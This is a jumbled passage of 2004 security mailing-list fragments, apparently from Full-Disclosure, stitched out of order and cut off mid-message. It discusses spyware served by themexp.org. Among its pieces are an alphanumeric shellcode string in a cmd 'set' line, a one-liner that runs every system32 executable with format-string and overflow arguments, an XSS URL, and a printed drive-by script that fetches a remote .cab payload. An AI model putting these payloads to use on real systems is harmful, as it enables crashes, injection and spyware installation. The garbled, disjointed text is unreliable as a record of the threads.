Cool. I will also add to the discussion with an alphanumeric version written
with two others for experimentation, though it is limited in that it doesn't vary
the length of the decoder stubs or encoded shellcode. spoonm is doing a
separate version--I think based on Berend's alpha--that will. Also, I
file
ATPartners.cab
[ 3:25AM]
ATPartners.cab: Microsoft Cabinet file, 52795 bytes, 2 files
cabextract
ATPartners.cab
[ 3:25AM]
ATPartners.cab: WARNING; poss
Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back
together:
---
set
!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLK
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
=
FreeBSD-SA-04:15.syscons Security Advisory
The FreeBSD Project
Topic: B
>Ok, how to delete that crap? Any idea?
from http://www.ss64.com/nt/del.html
Files are sometimes created with the reserved names: CON, AUX, COM1, COM2,
COM3, COM4, LPT1, LPT2, LPT3, PRN, NUL
To delete these use the syntax: DEL \\.\C:\somedir\LPT1
same idea using RMDIR to get rid of the directory
Gossi wrote:
--__--__--
Message: 12
Date: Mon, 4 Oct 2004 10:15:46 -0500 (CDT)
From: Gossi The Dog <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Spyware installs with no interaction in IE
Hi group,
> I don't think your super AV will detect the "eicar
> test string file" within "NULL.con" folder??? :)
My AV detected the string... www.free-av.de H+BEDV Datentechnik GmbH.
> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.
Ok, how to delete
http://themexp.org//preview.php?mid=72936&type=>"'>&view=date&page=&cat=&name=blue+biohazard.zip
Above is a measly example of XSS - upload any file you like if you want to the site with XSS; seems to be open to all sorts - but I just spidered the web
I do not believe the point was to show that you can chew up system
resources... although that IS a side effect. That was not the point.
Add a sleep statement in there if it makes you feel better.
-KF
Clairmont, Jan M wrote:
;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
Alex Wrote-->
---> Oooo my...
---> Got around 12 of win32 executable crashes on my Win2K server with all
---> patches...
---> This is much better tool than MS Baseline Security analyzer :-(
Alex I don't know why you would run it on a working server??.did you
want to reboot anywa
;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
;;for %i in (*.exe) do start %i AA (type
as ;;much "A"-s as cmd.exe allows on one line.)
Any system UNIX at least use to churn and eat system resources with a spawned
shell, thi
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Hi Everyone! I am running Suse 9.0 and I
have installed qmail (netqmail Ver. 1.05) amavis
(amavis-new Ver. 20030616p5-23) antivir (Ver 2.08-16) Antivir
seems to be an evaluation version. (The one that came with Suse
9.0) I downloaded the EICAR E-Mail Test Virus but when I send
either an in
Oooo my...
Got around 12 of win32 executable crashes on my Win2K server with all
patches...
This is much better tool than MS Baseline Security analyzer :-(
- Original Message -
From: "Berend-Jan Wever" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, October 04, 2004 11:39 AM
Su
On my win2k box with SP4
atmadm.exe crashed with the format string test.
csvde.exe ipconfig.exe ldifde.exe sort.exe all crashed on the bof test.
-KF
Berend-Jan Wever wrote:
Hi all,
Wanna do a quick test to see if the programmers that wrote your windows operating
system have any clue as to what the
Yes... ThemeXP.org has this in the HTML..
http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js";>
Which calls...
http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
Which contains...
document.write('');
document_code = '\n';
d
To expand on this "About Wrap". I have posted images to this site
before the site went downhill. Some of the authors would allow
the site to wrap their images with ads (therefore making money for the
site). It appears they are now wrapping images with installed ad-ware.
It appears the n
hi,
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from
Hi all,
Wanna do a quick test to see if the programmers that wrote your windows operating
system have any clue as to what they're doing? Run these commands from cmd.exe in the
system32 directory:
for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
for %i in (*.exe) do start %i
var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';
var retry_enabled = true;
var retry_cnt=1;
executeScript(getCookie('minpopup80wu03rd'));
function executeScript(CookieExists) {
//Check if cookie exists, if it does we know the user has visited the
site wit
hi,
> I was unable to verify it, since I don't use IE, and would prefer not
> infecting myself on accident, however I did run across this:
>
> http://themexp.org/about_wrap.php
>
> Perhaps one of the themes you downloaded was bundled with the spyware?
two tiny links from there:
http://WWW.ad
nope, there is no error message when accessing this site as a user - just
a very quick flash of a pop-up going to wepdt(?).gator.something.
There doesn't appear to be any trace on this computer of any of the
files mentioned previously so i guess that you may need to be running as
admin to get
Yep Themexp.org was my wallpaper stop for a while. But it was taken over
by new owners a while ago about and it is turning south, into a
adware/spyware/pop-up site. Kinda sad, it was a very good site.
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf O
Aren't there still cross-scripting problems with IE still? Plus I think
the Drag and Drop exploit is still unpatched? Comments anyone?
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Harlan Carvey
> Sent: Sunday, October 03, 2004 2:37 PM
> To: [E
Interesting...
I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error messag
I was unable to verify it, since I don't use IE, and would prefer not
infecting myself on accident, however I did run across this:
http://themexp.org/about_wrap.php
Perhaps one of the themes you downloaded was bundled with the spyware?
Geraldo Rivera wrote:
themexp.org
I should have logged all t
themexp.org
I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:
SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Sys
---
Fedora Legacy Update Advisory
Synopsis: Updated libxml2 resolves security vulnerability
Advisory ID: FLSA:1324
Issue date:2004-10-04
Product: Red Hat Linux
Keywords: Sec
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 557-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 4th, 2004